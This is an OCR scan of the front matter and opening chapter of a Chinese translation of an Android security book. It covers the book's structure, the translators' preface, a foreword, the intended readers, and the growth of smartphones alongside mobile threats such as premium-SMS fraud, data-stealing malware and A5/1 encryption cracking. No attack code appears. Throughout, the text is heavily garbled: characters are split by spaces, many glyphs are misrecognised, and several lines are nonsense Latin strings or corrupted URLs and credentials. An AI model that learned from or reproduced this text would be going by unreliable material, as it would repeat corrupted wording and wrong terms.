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本 书 共 分 为 10 3$, 98 1 章 介绍 了 移动 设备 的 发 展 格局 ; 第 2 章 和 第 3 
章 分 别 介绍 了 Android 操作 系统 和 应 用 程序 的 体系 结构 ; 第 4 章 深 入 研究 了 
Android 系统 的 安全 特性 ; 第 5~9 章 介 绍 了 Android 系统 平台 和 Android 应 
用 程序 安全 问题 的 各 个 方面 ; 第 10 章 展望 了 未 来 移动 设备 安全 威胁 的 发 展 
格局 。 附 录 A 和 附录 B 分 别 讨论 了 Android 权限 的 风险 等 级 和 JEB 反 编 译 
AAHAS; 附录 C 演示 了 如 何 破解 第 7 章 中 的 SecureApp. apk 应 用 程序 ， 
具体 的 破解 方法 和 步骤 ， 可 在 本 书 网 站 (www. androidinsecurity. com) 上 获 
得 ; 附录 D 是 本 书 出 现 的 缩 略 语 的 中 英文 对 照 。 

本 书 主 要 面向 安全 架构 师 、 系 统管 理 人 员 、 企 业 软 件 开发 周期 主管 、 
FEAR., HIERZ. BANZAR., ITAM, KRASE, FAMË 
通用 户 。 
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随 着 信息 技术 的 快速 发 展 ， 信 息 已 经 成 为 人 们 日 常生 活 和 工作 中 的 重要 资源 。 
围绕 着 信息 资源 的 安全 问题 逐渐 引起 人 们 的 关注 ， 特 别 是 利用 移动 设备 和 信息 网 络 
发 起 的 各 种 非法 和 犯罪 行为 。 例 如 ,窃取 企业 信息 资源 、 商 业 机 密 和 个 人 隐私 、 网 
络 钓鱼 、 网 络 间谍 刺探 等 恶意 行为 。 而 且 ， 随 着 智能 移动 设备 日 益 普 及 ， 搭 载 各 种 
智能 移动 操作 系统 平台 的 设备 逐渐 进入 人 们 社会 生活 的 各 个 层面 (政府 机 关 、 企 
业 团 体 、 家 居 生 活 等 )， 鉴 于 移动 设备 与 生 俱 来 的 安全 短 板 ， 信 息 资源 的 安全 问题 
变 得 更 加 的 复杂 和 严峻 。 

在 当今 众多 的 移动 设备 中 ， 搭 载 Android 系统 的 移动 设备 在 智能 移动 市 场 份额 
上 独占 敖 头 ， 几 乎 在 每 十 部 搭载 智能 移动 系统 的 设备 中 ， 至 少 就 有 6 部 搭载 
Android 系 统 的 设备 。Android 系统 自 2008 年 10 月 第 一 次 试 水 商用 以 来 ， 经 过 短 短 
的 五 年 时 间 ， 迅 速 发 展 成 全 球 最 为 普及 和 流行 的 、 应 用 程序 最 为 丰富 的 智能 移动 操 
作 系 统 平台 。 据 2013 年 统计 数据 ， 全 球 约 76% 的 移动 设备 和 约 80% 的 智能 手机 ， 
采用 的 都 是 Android 操作 系统 平台 。 除 此 之 外 ，Android 系统 正在 以 迅 独 的 速度 向 
更 加 广泛 的 应 用 领域 扩张 ， 包 括 智能 家 电 、 智 能 汽车 电子 、 企 业 计 算 基 础 设施 、 智 
能 定位 导航 终端 、 游 戏 机 ， 甚 至 笔记 本 电脑 等 。Android 系统 如 此 大 的 市 场 占有 量 、 
用 户 普 及 度 ， 以 及 如 此 迅 独 的 发 展 势 头 ， 使 得 Android 系统 的 信息 安全 问题 直接 牵 
动 着 移动 设备 信息 资源 领域 的 安全 动向 。 同 传统 的 台式 机 /笔记 本 电脑 系统 相 比 ， 
搭载 Android 系统 平台 的 智能 移动 设备 ， 无 论 在 设备 屏幕 分 辩 能 力 、 安 全 软件 成 熟 
E, 还 是 用 户 安全 意识 方面 ， 都 不 及 前 者 。 而 且 ， 如 今 的 智能 移动 设备 发 展 迅 速 ， 
设备 本 身 配 置 各 种 功能 模块 ， 如 GPS, Wi-Fi, NFC, F, UA Wi-Fi Direct 等 ， 
而 这 些 技术 /模块 又 为 恶意 攻击 者 提供 更 多 的 入 侵 设 备 的 渠道 。 此 外 ，Android 智能 
移动 设备 完善 、 丰 富 的 功能 ， 使 得 一 部 小 小 的 智能 手机 几乎 可 以 承担 传统 合式 机 / 
笔记 本 电脑 处 理 的 大 部 分 个 人 日 常 业 务 ， 如 日 程 安排 计划 、 电 子 邮 件 收 发 、 文 档 表 
格 处 理 、 网 上 银行 个 人 支付 、 手 机 银行 、 股 票 理财 等 账户 操作 管理 、 网 络 账号 登 
录 、 生 活 工 作业 务 数 据 备份 同步 等 ,个 人 或 企业 用 户 在 进行 上 述 业 务 操作 时 ， 需 要 
移动 设备 提供 可 靠 的 安全 环境 、 企 业 制 定 规范 的 安全 制度 和 用 户 树立 良好 的 安全 意 
识 ， 和 否则 ， 这 些 业 务 中 涉及 的 数据 将 不 可 避免 地 成 为 恶意 攻击 者 疯 饮 的 目标 。 

本 书 在 这 一 背景 下 ， 系 统 地 介绍 了 Android 系统 的 体系 结构 、Android 应 用 程 
序 的 组 成 架构 与 运行 机 制 ， 深 入 地 分 析 了 Android 系统 的 安全 机 制 ， 概 述 了 针对 
Android 系统 的 威胁 演化 过 程 与 发 展 格 局 。 同 时 ， 结 合 近期 出 现 的 几 例 Android J& 
洞 与 恶意 软件 ， 系 统 地 总 结 了 Android 系统 的 安全 漏洞 ， 并 对 恶意 软件 的 特点 进行 
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了 深入 的 剖析 。 此 外 ， 本 书 最 大 的 特点 是 从 Android 安全 攻 与 防 的 角度 出 发 ， 基 于 
对 各 种 针对 Android 信息 安全 的 攻击 方式 的 详细 介绍 ， 进 行 深入 地 剖析 ， 并 给 出 应 
对 措施 。 并 且 ， 对 几 种 主要 的 Android 系统 与 应 用 程序 的 分 析 方 法 和 工具 进行 了 详 
细 的 介绍 和 归 类 ， 包 括 渗透 测试 、 逆 向 工程 等 手段 ， 为 Android 设备 的 普通 用 户 、 
移动 应 用 程序 开发 者 、 企 业 安全 分 析 人 员 、 企 业 安全 管理 员 等 人 士 ， 提 供 高 效 的 分 
析 工 具 和 详实 的 测试 指导 。 从 而 ， 便 于 上 述 人 员 能 够 有 效 地 区 分 恶意 Android 应 
用 、 开 发 安全 的 Android 应 用 程序 、 部 署 可 靠 的 企业 Android 设备 环境 和 制定 完 
健全 的 企业 安全 规章 。 

本 书 主 要 由 王 秋 爽 、 郎 为 民 、 王 大 鹏 、 斯 焰 翻 译 ， 天 津 师范 大 学 的 硕士 研究 生 
dd. MORI NE RECEN MK, Ar. E EM. EX. X EE. AD 
B. EG. REF, KAF, ETI, AERE. KW. ER, RESISTA 
部 分 章节 的 翻译 工作 ， 和 湘 、 朱 元 诚 、 高 泳 洪 、 周 莉 、 蔡 理 金 、 王 会 涛 绘制 了 本 书 
的 全 部 图 表 ， 李 建 军 、 新 烙 、 王 适 东 、 孙 月 光 、 孙 少 兰 、 马 同 兵 对 本 书 的 初稿 进行 
了 审 校 ， 并 更 正 了 不 少 错误 ， 在 此 一 并 向 他 们 表示 囊 心 的 感谢 。 同 时 ， 本 书 是 译 者 
在 尽量 忠实 于 原 书 的 基础 上 翻译 而 成 的 ， 书 中 的 意见 和 观点 并 不 代表 译 者 本 人 及 所 
在 单位 的 意见 和 观点 。 

由 于 译 者 水 平 有 限 ， 翻 译 时 间 仓 促 ， 因 而 本 书 翻 译 中 的 错漏 之 处 在 所 难免 ， 居 
请 各 位 专家 和 读者 不 音 指出 。 
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近年 来 针对 移动 设备 的 网 络 威胁 始终 在 不 断 地 增加 。 随 着 Android 系统 逐渐 成 
为 主流 的 移动 设备 系统 平台 ,与 该 系统 相关 的 安全 问题 也 逐渐 成 为 个 人 和 和 企业 客户 
关注 的 越 来 越 多 的 问题 。 本 书 对 Android 系统 及 其 功能 特性 的 发 展 过 程 进行 了 深入 
的 剖析 、 讨 论 了 各 种 针对 Android 设备 的 攻击 方法 ， 为 移动 应 用 程序 开发 人 员 、 安 
全 架构 师 ， 以 及 其 他 各 类 专业 人 员 ， 提 供 了 掌握 移动 设备 安全 威胁 防御 手段 所 必需 
的 各 类 基础 知识 ， 从 而 使 读者 树立 良好 的 Android 安全 防御 意识 。 

在 当今 世界 移动 设备 大 量 普 及 的 背景 下 和 移动 设备 的 广泛 领域 中 ，Dubey 和 
Misra 开始 关注 Android 系统 的 崛起 和 该 系统 平台 所 面临 的 各 种 安全 挑战 。 他 们 超 
越 了 传统 的 被 应 用 程序 开发 者 熟知 和 掌握 的 基本 安全 概念 ， 致 力 于 解决 更 加 重要 
和 高 级 的 安全 课题 。 例 如 ， 攻 击 对 策 、 企 业内 部 Android 系统 整合 ， 以 及 与 之 相 
关 的 企业 监管 与 合 规 风险 。 通 过 本 书 ， 任 何 对 移动 安全 感 兴趣 的 人 ， 都 可 以 快速 
地 熟悉 Android 系统 平台 ， 并 且 在 保护 个 人 和 企业 客户 免 于 遭受 日 益 增长 的 移动 
设备 安全 威胁 方面 ， 获 得 独特 的 安全 策略 视角 。 这 对 于 安全 架构 师 和 安全 顾问 ， 
以 及 从 事 移动 设备 与 应 用 程序 的 企业 安全 管理 人 员 来 说 ， 是 一 种 必须 具备 的 
能 力 。 

TAE 梅 隆 大 学 信息 网 络 研究 所 主任 兼 CyLab 网 络 实 验 室 教 育 、 培 训 、 外 联 主任 
Dena Haritos Tsamitis 博士 

Dena Haritos Tsamitis 博士 领导 的 信息 网 络 研 究 所 (Information Networking 
Institute，INI) ， 是 卡 内 基 … 梅 隆 大 学 工程 学 院 的 一 个 全 球 性 的 、 跨 学 科 的 部 门 。 
她 主管 着 信息 网 络 研究 所 的 研究 生 专 业 ， 包括 信 息 网 络 专业 、 信 息 安 全 技术 与 管 
理 专业 和 信息 技术 专业 。 在 她 的 带领 下 ,信息 网 络 研究 所 将 其 专业 推广 到 了 全 球 
各 个 地 区 ， 并 力主 同 卡 内 基 … 梅 隆 大 学 硅谷 校区 合作 ， 将 信息 安全 、 移 动 与 软件 
管理 学 科 打 造成 “美国 双 海 岸 ” 共 建 专业 。Dena 博士 还 主管 卡 内 基 . 梅 隆 大 学 
CyLab 网 络 实验 室 的 教育 、 培 训 和 外 联 事务 。 她 是 NSF (National Science Founda- 
tion， 国 家 科学 基金 会 ) 资助 的 两 个 信息 安全 教育 项 目 (CyberCorps 奖学金 计 
划 吕 和 信息 安全 保障 能 力 构 建 计划 ) 的 主要 研究 者 ， 同 时 还 是 DOD (Department 


C  CyberCorps 奖学金 计划 ， 用 于 资助 实施 “网 络 空间 人 才 ” ( CyberCorps) 计划 ， 鼓 励 高 等 院 校 开 设 
计算 机 安全 专业 、 开 展 专项 课题 研究 ， 并 为 志愿 从 事 计算 机 安全 工作 相关 专业 的 大 学 生 提供 奖 字 
To 一 一 译 者 注 
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of Defense of the United States， 美 国 国 防 部 ) 资助 的 信息 安全 保障 基金 项 目的 主 
要 研究 者 。 她 曾 荣 获 过 2012 年 度 卡 内 基 . 梅 隆 大 学 Barbara Lazarus €, UL X € 
其 在 研究 生 和 和 青年 教师 的 指导 上 所 作出 的 贡献 此外， 她 还 被 Alta 联合 公司 和 
CSO Zt dE, RR 2008 年 度 女 性 影响 力 奖 ， 以 表彰 她 在 信息 安全 和 教育 领域 
的 成 就 。 
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2007 年 苹果 公司 推出 iPhone 手机， 开启 了 移动 设备 和 移动 应 用 程序 领域 的 新 
纪元 。 随 后 ，Google 公司 的 Android 系统 平台 也 成 为 移动 设备 市 场 中 的 重要 成 员 ， 
并 且 到 2012 和 年， 搭载 Android 系统 的 移动 设备 的 出 货 量 首 度 超 越 了 革 果 公司 的 
iPhone 手机 。 随 着 移动 设备 逐渐 成 为 主流 ， 针 对 移动 设备 的 威胁 也 在 不 断 地 演化 。 
wA, Android 系统 的 大 量 普 及 ， 已 经 引起 了 众多 恶意 攻击 者 的 注意 。 可 以 看 到 ， 
近年 来 针对 Android 系统 平台 的 攻击 案例 数量 正在 不 断 地 攀升 。 
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本 书 从 安全 问题 和 威胁 的 角度 ， 对 Android 系统 平台 和 应 用 程序 进行 了 分 析 。 
所 有 对 Android 系统 安全 或 对 Android 在 安全 方面 的 优势 和 劣势 感 兴趣 的 人 人士， 都 
属于 本 书 的 读者 群 。 书 中 介绍 了 Android 操作 系统 和 应 用 程序 的 体系 结构 AY 
Android 系统 平台 提供 的 各 种 安全 特性 。 随 后 ， 本 书 又 介绍 了 分 析 和 测试 Android 
平台 和 应 用 程序 安全 问题 的 各 种 方法 和 工具 。 最 后 ， 本 书 还 介绍 了 企业 环境 下 An- 
droid 设备 存在 的 各 种 安全 隐患 ， 以 及 增强 Android 设备 和 应 用 程序 安全 性 的 措施 和 
步骤 。 尽 管 本 书 主要 关注 的 是 Android 系统 平台 的 安全 问题 ， 但 是 书 中 论述 的 很 多 
问题 和 和 原则， 同样 适用 于 其 他 主流 的 操作 系统 平台 。 
假设 

本 书 假设 读者 熟悉 操作 系统 的 相关 知识 并 拥有 一 定 的 安全 概念 。 如 果 读 者 掌握 
有 关 湛 透 测 试 、 威 胁 建 模 和 常见 的 Web 应 用 程序 与 浏览 器 漏洞 的 相关 知识 更 好 ， 
不 过 如 果 读 者 没有 等 握 这 些 知 识 ， 在 本 书 的 阅读 上 也 是 没有 问题 的 。 
读者 

本 书 主 要 面向 安全 架构 师 、 系 统管 理 人 员 、 企 业 SDLC (Software Development 


Life Cycle， 软 件 开发 周期 ) 主管 、 开 发 人 员 、 白 帆 黑 客 了 、 渗 透 测 试 人 员 、 代 加 
构 师 、CIO (Chief Information Officer， 首 席 信 息 官 )、 学 生 和 普通 用 户 。 如 果 你 想 


O WRZ (white-hat hacker) ， 又 称 白 帆 匿 名 者 、 白 帽子 ， 是 指 利用 黑客 技术 测试 网 络 和 系统 的 性 
能 ， 从 而 判定 它们 能 够 承受 人 侵 的 强 弱 程 度 ， 和 网 络 安全 工程 师 的 性 质 有 点 相同 。 通 常 他 们 被 企业 
聘请 来 攻击 他 们 自己 的 系统 或 客户 的 系统 以 便 进行 安全 审查 。 一 译 者 注 
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要 了 解 Android 系统 的 安全 特性 、 潜 在 的 安全 攻击 ， 以 及 防御 这 些 攻 击 的 办 法 ， 你 
会 发 现 书 中 的 每 一 章 ， 对 你 来 说 都 可 以 成 为 实用 的 出 发 点 。 我 们 的 目标 是 为 读者 提 
供 充 足 的 信息 和 所 有 Android 平台 的 基础 知识 ， 以 及 背后 相关 的 安全 问题 ， 从 而 使 
读者 能 够 快速 了 解 Android 系统 并 驰 怠 于 Android 系统 安全 领域 。 如 果 你 是 一 名 
Android 黑 客 ， 或 者 你 已 经 相当 精通 Android 平台 的 安全 问题 了 ， 那么 本 书 并 不 迁 
合 你 。 


支持 


本 书 的 勘误 表 和 相关 资源 可 从 CRC 出 版 社 的 网 站 ,以 及 我 们 的 网 站 
www. androidinsecurity. com 上 获得 。 在 我 们 的 网 站 上 ， 有 其 他 用 户 创建 的 应 用 程序 
和 工具 ， 可 以 提供 给 读者 下 载 。 本 书 作 者 编写 的 示例 应 用 程序 ， 可 以 在 我 们 网 站 的 
资源 部 分 获得 。 读 者 可 以 结合 书 中 内 容 ， 使 用 下 述 账 号 和 密码 ， 从 我 们 网 站 上 下 载 
相应 的 apk 文件 进行 练习 。 


MP: android 
44b. 1439896461 (本 书 的 10 位 ISBNS ) 
本 书 结构 


本 书 共 分 为 10 章 。 第 1 章 介 绍 了 移动 设备 的 发 展 格 局 ; 第 2 章 和 第 3 章 分 别 
介绍 了 Android 操作 系统 和 应 用 程序 的 体系 结构 ; 第 4 章 深 入 研究 了 Android 系统 
的 安全 特性 ;第 5~9 章 介绍 了 Android 系统 平台 和 Android 应 用 程序 安全 问题 的 各 
个 方面 ; 第 10 章 展 望 了 未 来 移动 设备 安全 威胁 的 发 展 格 局 。 附 录 A 和 附录 B 分 别 
讨论 了 Android 权限 的 风险 等 级 和 JEB 反 编 译 器 的 用 法 ; 附录 C 演示 了 如 何 破 解 第 
7 章 中 的 SecureApp. apk 应 用 程序 ， 具 体 的 破解 方法 和 步骤 ， 可 在 本 书 网 站 
( www. androidinsecurity. com) 上 获得 。 


O ”此 为 英文 原版 书 的 10 位 ISBN. 
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第 1 章 s 3 


本 章 主 要 介绍 当前 移动 设备 的 发 展 格局 ， 以 及 Android 系统 的 安全 至 关 重 要 的 
原因 。 本 草 先 是 从 传统 手机 到 智能 手机 (包括 搭载 Android 系统 的 智能 手机 ) 的 发 
展 过 程 者 手 ， 分 析 了 移动 设备 安全 威胁 的 演化 过 程 。 然 后 ， 将 对 Android 系统 的 历 
史 、 发 布 版 本 以 及 Android 应 用 程序 商店 进行 详细 的 介绍 。 


1.1 选择 Android 系统 的 原因 


目前 ， 移 动 设备 上 移动 互联 网 用 户 数 量 的 增长 极其 迅速 。 从 图 1. 1 的 统计 结果 
中 可 见 ， 在 新 兴 发 达 市 场 中 ， 当 前 移动 设备 的 经 济 占 有 量 仍 处 于 起 步 阶段 ,但 在 未 
来 的 十 年 里 ， 这 一 占有 量 将 产生 巨大 的 增长 。 


不 同类 型 手机 拥有 量 
o 045A 2012 年 2 月 





图 1.1 美国 传统 手机 与 智能 手机 占有 量 对 比 


如 图 1.2 和 图 1.3 所 示 ， 在 所 有 的 智能 手机 中 Android 系统 平台 占有 率 达 到 
64% ， 约 占 总 手机 数量 的 23.5%2。 目 前 ， 智 能 手机 仅 约 占 379 ， 仍 有 超过 60% 
的 巨大 市 场 向 智能 手机 敞开 。 鉴 于 Android 系统 份额 在 智能 手机 市 场 中 已 经 取得 


O 数据 来 自 维基 百科 ，http:Vy/en. wikipedia. org/ wiki/Mobile operating system; 一 一 原 书 注 
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了 稳步 的 增长 ， 预 计 在 不 久 的 将 来 ，Android 系统 平台 的 占有 率 仍 将 保持 类 似 的 
增长 。 以 Android 系统 为 引导， 在 新 兴 市 场 和 发 达 经 济 市 场 中 ， 智 能 手机 的 占有 
量 将 有 类 似 的 增长 。 即 便 是 在 最 近 的 经 济 低迷 期 ， 智 能 手机 的 用 户 量 仍 保持 着 稳 
步 的 增长 。 预 计 在 不 和 久 的 将 来 ， 移 动 设 备 将 超过 服务 器 和 个 人 电脑 成 为 主要 的 互 
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在 那 时 ， 智 能 手机 还 不 是 必需 品 ， 反 而 仅仅 被 认为 是 技术 发 烧 友 的 小 玩具 。1996 
年 ， 出 现 了 第 一 部 搭载 Windows CE 系统 的 手持 设备 。 然 而 ， 直 到 2000 年 移动 智能 手机 
才 真 正 走 进 人 们 的 生活 ， 那 一 年 爱立信 公司 发 布 了 一 款 搭 载 诺 基 亚 Symbian 操作 系统 的 
智能 手机 一 一 爱立信 R380。 那 段 时 间 ， 手 机 和 PDA (Portable Digital Assistant ， 个 人 数 
字 助 理 ) 还 是 彼此 分 离 的 设备 (不 知 大 家 是 否 还 记得 iPaq?)。 

2002 年 ， 微 软 和 RIM 公司 分 别 发 布 了 搭载 Windows CE 和 Blackberry ( W ) 
操作 系统 的 智能 手机 。 尽 管 在 Blackberry 系统 的 智能 手机 发 布 之 后 ， 两 大 公司 的 智 


O ”数据 来 自 维基 百科 ，http: //en. wikipedia. org/wikiAMobile_operating_system。 一 一 原 书 注 
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图 1.3 全 球 智 能 手机 一 季度 销售 量 弓 


能 手机 加 起 来 在 手机 市 场 占有 了 一 定 的 份额 ,但 智能 手机 真正 地 走 进 并 占有 终端 手 
机 用 户 市 场 则 是 出 现在 2007 年 苹果 公司 推出 的 第 一 款 iPhone 智能 手机 之 后 。 那 
时 ，RIM 公司 还 占有 着 多 数 的 智能 手机 市 场 份额 。 不 过 ， 也 就 是 大 约 在 那个 时 
候 ，Google 公司 决定 涉足 移动 设备 市 场 。 未 来 移动 设备 将 被 用 来 承载 用 户 的 大 部 
分 活动 ， 也 就 意味 着 用 户 将 会 使 用 它们 进行 上 网 搜索 ， 而 这 也 正 是 Google 公司 
所 提供 的 核心 服务 项 目 。 随 着 可 以 在 移动 设备 上 投放 更 多 具有 针对 性 的 广告 ， 
告 收入 也 将 更 加 倚重 于 移动 设备 。 在 台式 机 或 笔记 本 上 搜索 “比萨 饼 ” 时 ， 
Google 公司 只 能 通过 设备 的 IP 地 址 获得 用 户 的 位 置信 息 和 其 他 信息 。 然 而 ， 在 
移动 电话 上 ，Google 公司 就 能 够 利用 手机 GPS 提供 的 位 置信 息 向 用 户 推送 在 其 
身边 的 “相关 广告 ”。 

2007 年 ， 开 放手 机 联盟 (Open Handset Alliance, OHA ) 首次 亮相 ，2008 年 
Google 公司 对 外 发 布 了 首 款 商用 Android 操作 系统 。 

如 图 1.4 所 示 ， 移 动 设备 的 计算 能 力 成 倍增 长 。HTC EVO 4G 手机 配备 了 


O Mek HAE, http; //en. wikipedia. org/wiki/Mobile, operating system, 一 一 原 书 注 
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1GHz 主 频 的 高 通 8650 处 理 器 、1GB ROM (Read-Only Memory， 只 读 存储 器 ， 用 于 
存储 系统 软件 ) 和 512MB RAM (Random Access Memory, ps eg > E 
时 ,该 手机 还 配备 了 802.11b/g Wi-Fi, W Z7 J) fé, 800 万 像素 照相 机 、GPS 
( Global Positioning System， 全 球 定 位 系统 ) 功能 和 HDMI (High Definition 


dia Interface， 高 清晰 度 多 媒体 接口 ) 。 这 款 手 机 的 配置 足以 超过 几 年 前 的 主流 台 z 
机 的 配置 ， 而 且 这 种 追求 高 配 的 趋势 很 可 能 仍 将 继续 下 去 。 
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图 1.4 iPhone, DroidX 和 一 台 老 式 台式 机 的 配置 比较 
从 图 1.5 中 可 以 看 到 ，Android 系统 的 市 场 份 额 一 直 保 持 稳 定 的 增长 速度 。 
E 移动 设备 操作 系统 市 场 份额 
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图 1.5 移动 设备 操作 系统 市 场 份额 
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2011 Æ, Android 设备 销售 量 首次 超过 了 iPhone。 从 图 1.6 中 可 以 看 到 ， 到 2011 年 
中 期 为 止 ， 每 天 约 有 50 万 部 Android 设备 被 激活 。 图 1.7 显示 的 是 已 经 转向 
Android 系 统 的 运营 商 和 制造 商 的 数量 。 





图 1.7 主流 运营 商 的 Android 设备 


iPad 推出 之 后 ， 很 多 制造 商 将 Android 系统 作为 其 产品 的 操作 系统 平台 。 三 星 
Galaxy Tab 就 是 一 个 完美 的 例子 。 其 他 厂商 (如 戴尔 、 东 芝 等 ) 也 已 经 开始 推出 拾 
载 Android 系统 的 平板 电脑 ， 如 图 1.8 所 示 。 在 平板 电脑 的 市 场 中 ，Android H iOS 
作为 两 大 主流 操作 系统 平台 并 存 的 趋势 很 有 可 能 仍 将 持续 下 去 。 
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图 1.8 主流 厂商 的 Android 设备 


1.2 移动 设备 的 威胁 演化 


随 着 移动 设备 从 传统 电话 发 展 到 智能 手机 ， 针 对 移动 设备 的 威胁 也 与 之 同时 演 
化 。 同 过 去 传统 手机 相 比 ， 智 能 手机 具有 更 大 的 被 攻击 面 。 而 且 ， 智 能 设备 早已 突 
破 了 传统 的 使 用 方式 ， 传 统 手机 主要 用 来 打 电 话 和 发 短信 。 如 今 ， 智 能 手机 几乎 可 
以 用 来 完成 人 们 在 电脑 上 想 做 的 任何 事情 ， 如 进行 日 常 的 银行 交易 、 登 录 Facebook 
社交 平台 、 导 航 、 维 护 健康 ， 以 及 锻炼 记录 等 。 

曾经 很 长 的 一 段 时 间 ， 诺基亚 的 Symbian 操作 系统 一 直 是 主要 的 威胁 攻击 目 
标 。 然 而 ， 由 于 Symbian 系统 的 市 场 份额 持续 下 滑 ，Android 设备 和 iPhone 的 市 场 
占有 量 持续 增长 。 目 前 ， 攻 击 者 已 经 开始 转向 攻击 这 些 新 兴 的 系统 平台 。 

在 美国 以 外 的 其 他 国家 里 ，Symbian 仍然 是 主流 的 手机 系统 平台 。 因 此 ， 在 未 来 的 
一 段 时 间 ， 该 系统 仍 将 是 被 攻击 的 目标 。 不 过 ， 随 着 针对 Android 和 iPhone 设备 的 攻击 
事件 不 断 地 增多 ， 攻 击 的 方式 和 手段 也 更 趋 于 复杂 。 可 见 ， 黑 客 们 更 青睐 于 流行 的 系统 
平台 ， 随 着 Android 系统 的 日 益 流 行 ， 针 对 该 系统 的 安全 威胁 数量 也 将 随 之 持续 增长 。 

从 Android 设备 的 威胁 格局 上 来 看 ， 过 往 的 这 两 三 年 里 ， 针 对 Android 的 用 户 
和 应 用 程序 的 攻击 数量 已 经 大 幅 地 增长 。 随 着 Android 系统 市 场 占 有 率 的 增长 ， 攻 
击 者 已 经 把 攻击 目标 转向 了 该 系统 和 它 的 用 户 ，Android 系统 上 的 恶意 软件 的 数量 
也 随 之 呈 上 升 趋势 。 

这 一 增长 趋势 并 不 局 限于 Android 设备 的 占有 量 ， 移 动 电话 的 功能 也 随 之 越 来 
越 丰富 ， 不 过 ， 由 此 产生 的 攻击 面 也 越 来 越 大 。 如 今 ， 在 一 部 典型 的 智能 手机 上 所 
能 获取 的 数据 类 型 和 所 能 做 的 事情 都 远 远 不 同 于 几 年 以 前 。 

针对 传统 手机 的 攻击 目标 主要 在 于 短信 、 手 机 号 码 和 设备 上 有 限 数据 的 获取 
上 。 典 型 的 案例 比如 ， 针 对 增值 短信 服务 的 攻击 。 攻 击 者 操控 用 户 手 机 向 付费 服务 
号 码 发 送 短信 或 拨打 电话 ， 让 用 户 损失 话费 。 和 这 些 攻击 不 一 样 的 是 ，Android 或 
其 他 智能 手机 上 的 攻击 则 更 具有 复杂 性 。 例 如 ， 亚 意 软 件 会 获取 用 户 的 敏感 信息 
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(如 个 人 资料 、 银 行 信 息 、 聊 天 记录 ) ， 然 后 将 它们 发 送 给 潜在 的 攻击 者 。 可 见 ， 
智能 手机 饱 受 大 量 针 对 敏感 信息 的 恶意 软件 的 影响 和 攻击 。 

如 下 是 一 部 典型 的 智能 手机 上 的 数据 样 例 : 

1) 企业 和 个 人 的 电子 邮件 。 

2) 通讯 录 (以 及 他 们 的 电子 邮件 地 址 和 个 人 地 址 ) 。 

3) 银行 信息 。 

4) 通讯 记录 。 

5) EH. 

6) 视频 。 

7) 信用 卡 信息 。 

8) 位 置 和 GPS 数据 。 

9) 健康 信息 。 

10) 日 程 安排 信息 。 

针对 搭载 Android 系统 平台 手机 的 攻击 可 能 导致 上 述 资 料 的 泄露 ， 一 些 可 能 的 攻击 
造成 的 危害 性 甚至 更 大 ， 比 如 像 社会 工程 学 ” 、 网 络 钓鱼 、 电 子 诈骗 、 间 谍 软 件 和 恶意 
软件 等 。 例 如 ， 手 机 上 的 某 个 应 用 软件 为 用 户 订 阅 了 一 项 付费 服务 ， 用 户 除了 需要 支付 
订阅 费 之 外 ， 还 要 承担 额外 的 流量 费 和 使 用 费 。 相 比 于 台式 电脑 ， 智 能 手机 上 的 浏览 各 
是 一 种 精简 版 的 浏览 器 ， 这 就 导致 了 智能 手机 操作 系统 和 浏览 器 上 的 加 密 功 能 会 受到 很 
大 的 限制 ， 并 且 需 要 消耗 更 多 的 处 理 时间 。 例 如 ， 从 移动 浏览 器 上 删除 证 书 的 操作 。 

直到 现在 ， 人 们 所 关注 的 攻击 还 大 多 停留 在 网 络 通信 的 应 用 和 协议 方面 ， 故 一 
类 攻击 则 是 针对 蜂 窒 技 术 本 号 进行 的 。GSM (Global System for Mobile Communication, 
全 球 移动 通信 系统 ) 和 CDMA ( Code Division Multiple Access, 码 分 多 址 ) 是 目前 
世界 上 应 用 最 广泛 的 通信 标准 ， 运 营 商 使 用 这 些 标准 提供 各 种 移动 电话 服务 〈 例 
如 ， 电 话 呼 叫 和 短信 等 ) 。 随 着 移动 设备 的 增加 ， 这 些 标准 已 经 得 到 了 包括 研究 人 
员 和 恶意 攻击 者 在 内 的 各 种 人 员 越 来 越 多 的 关注 。 

世界 上 多 数 的 蜂窝 移动 电话 采用 GSM 通信 标准 ， 该 标准 覆盖 了 200 多 个 国家 ， 
拥有 40 多 亿 用 户 。GSM 标准 采用 AS/1 加 密 技术 提供 无 线 通信 隐私 保护 功能 (如 
加 密 短信 和 呼叫 通话 ) 。 起 初 ， 该 加 密 技术 能 够 奏效 ， 不 过 有 人 通过 北向 工程 的 方 
式 破解 了 该 技术 ， 其 中 的 一 些 细节 被 泄露 公开 。20 世纪 90 年 代 初 ， 在 一 些 学 术 机 
构 以 及 相关 的 研究 论文 上 就 已 经 有 了 关于 A5/1 加 密 技 术 破解 过 程 的 介绍 。 到 2009 
年 ， 研 究 人 员 Karsten Nohl 通过 一 个 攻击 演示 了 如 何 获 取 A5/1 加 密 密 钥 ， 而 进行 
这 项 工作 其 至 只 需要 相当 便宜 的 设备 就 能 完成 。A5/1 加 密 技术 采用 64 PERO SR, 


O 社会 工程 学 ， 指 的 是 利用 大 众 玖 于 防范 ， 通 过 人 际 间 的 互动 ， 以 交谈 、 欺 骗 、 假 冒 等 方式 取得 用 户 
的 个 人 资料 ， 如 网 站 、 电 子 邮 件 、 网 上 银行 账号、 密码 、 信 用 卡 资料 等 。 一 一 详 者 注 
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如 今 使 用 硬件 设备 就 能 实施 攻击 。 已 知 一 条 消息 的 明文 和 密 文 ， 就 能 在 一 个 预先 计 
算 好 的 表 中 找到 密 钥 信息 。 考 虑 到 移动 设备 上 射频 识别 (Radio Frequency Identifi- 
cation, RFID) 功能 / 近 场 通信 (Near Field Communication, NFC) 功能 的 使 用 日 益 
频 莹 ， 这 不 仅 将 导致 短信 和 语音 通话 会 被 破解 ， 其 至 是 用 户 的 资料 数据 都 可 能 难 远 
被 破解 的 命运 ， 如 信用 卡 支付 信息 等 。 

很 多 用 户 都 没有 意识 到 移动 设备 上 存在 的 风险 和 威胁 ， 它 们 同 个 人 电脑 上 的 风险 和 
威胁 很 类 似 。 尽 管 多 数 用 户 会 在 笔记 本 或 台式 电脑 上 使 用 一 些 保护 措施 ( 如 安装 杀毒 软 
件 ) ， 但 是 他 们 却 没有 注意 到 保护 移动 设备 的 必要 性 。 多 数 用 户 缺 乏 专 业 知 识 ， 而 且 不 
懂得 移动 设备 上 某 些 操作 的 影响 ， 比 如 “越狱 "或 是 root2 。 用 户 总 是 把 他 们 的 信任 
寄托 在 那些 来 自 软 件 仓 库 中 的 应 用 软件 ， 无 论 是 苹果 公司 的 应 用 软件 商店 ,， 还 是 
Android 应 用 软件 市 场 。 然 而 ， 亚 意 软件 往往 伪 靖 成 一 些 流 行 的 应 用 软件 进入 Android 应 
